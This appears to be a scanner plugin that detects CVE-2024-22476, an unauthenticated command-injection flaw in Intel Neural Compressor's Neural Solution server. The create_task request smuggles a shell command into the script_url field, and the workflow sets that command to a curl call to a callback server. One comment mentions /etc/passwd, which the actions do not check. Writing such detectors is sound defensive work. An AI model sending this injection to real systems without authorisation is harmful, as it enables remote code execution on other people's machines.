# proto-file: proto/templated_plugin.proto
# proto-message: TemplatedPlugin

###############
# PLUGIN INFO #
###############

info: {
  type: VULN_DETECTION
  name: "IntelNeuralCompressor_CVE_2024_22476"
  author: 
    "Robert Dick (robert@doyensec.com) for the Templated version, "
    "frkngksl for the original Java version"
  version: "2.0"
}

finding: {
  main_id: {
    publisher: "GOOGLE"
    value: "CVE_2024_22476"
  }
  title: "CVE-2024-22476 Intel Neural Compressor RCE"
  description: 
    "The Intel Neural Compressor has a component called Neural Solution that brings"
    " the capabilities of Intel Neural Compressor as a service. The"
    " task/submit API in the Neural Solution webserver is vulnerable to an"
    " unauthenticated remote code execution (RCE) attack. The"
    " script_urlparameter in the body of the POST request for this API is not"
    " validated or filtered on the backend. As a result, attackers can"
    " manipulate this parameter to remotely execute arbitrary commands."
  recommendation: "You can upgrade your Intel Neural Compressor instances to 2.5.0 or later."
  severity: CRITICAL
  related_id: {
    publisher: "CVE"
    value: "CVE-2024-22476"
  }
}

###########
# ACTIONS #
###########

# one step to check for /etc/passwd, changed from original detector 
# because the original detector did not work correctly.

actions: {
  name: "fingerprint_neuralcompressor"
  http_request: {
    method: GET
    uri: "/"
    response: {
      http_status: 200
      expect_all: {
        conditions: [
          { body: {} contains: "{\"message\":\"Welcome to Neural Solution!\"}" }
        ]
      }
    }
  }
}

actions: {
  name: "create_task"
  http_request: {
    method: POST
    uri: "/task/submit/"
    data: 
      '{'
      '    "script_url": "https://github.com/huggingface/transformers/blob/v4.21-release/examples/pytorch/text-classification? & {{ PAYLOAD }}",'
      '    "optimized": "False",\n'
      '    "arguments": [\n'
      '        "--model_name_or_path bert-base-cased --task_name mrpc --do_eval --output_dir result"\n'
      '    ],\n'
      '    "approach": "static",\n'
      '    "requirements": [],\n'
      '    "workers": 1\n'
      '}'
    headers: [
      { name: "Content-Type" value: "application/json" }
    ]
  }
}

actions: {
  name: "sleep"
  utility: { sleep: { duration_ms: 3000 } }
}
actions: {
  name: "check_callback_server_logs"
  callback_server: { action_type: CHECK }
}

#############
# WORKFLOWS #
#############

workflows: {
  condition: REQUIRES_CALLBACK_SERVER
  variables: [
    { name: "PAYLOAD" value: "curl {{ T_CBS_URI }}"}
  ]
  actions: [
    "fingerprint_neuralcompressor",
    "create_task",
    "sleep",
    "check_callback_server_logs"
  ]
}

config: { debug: True }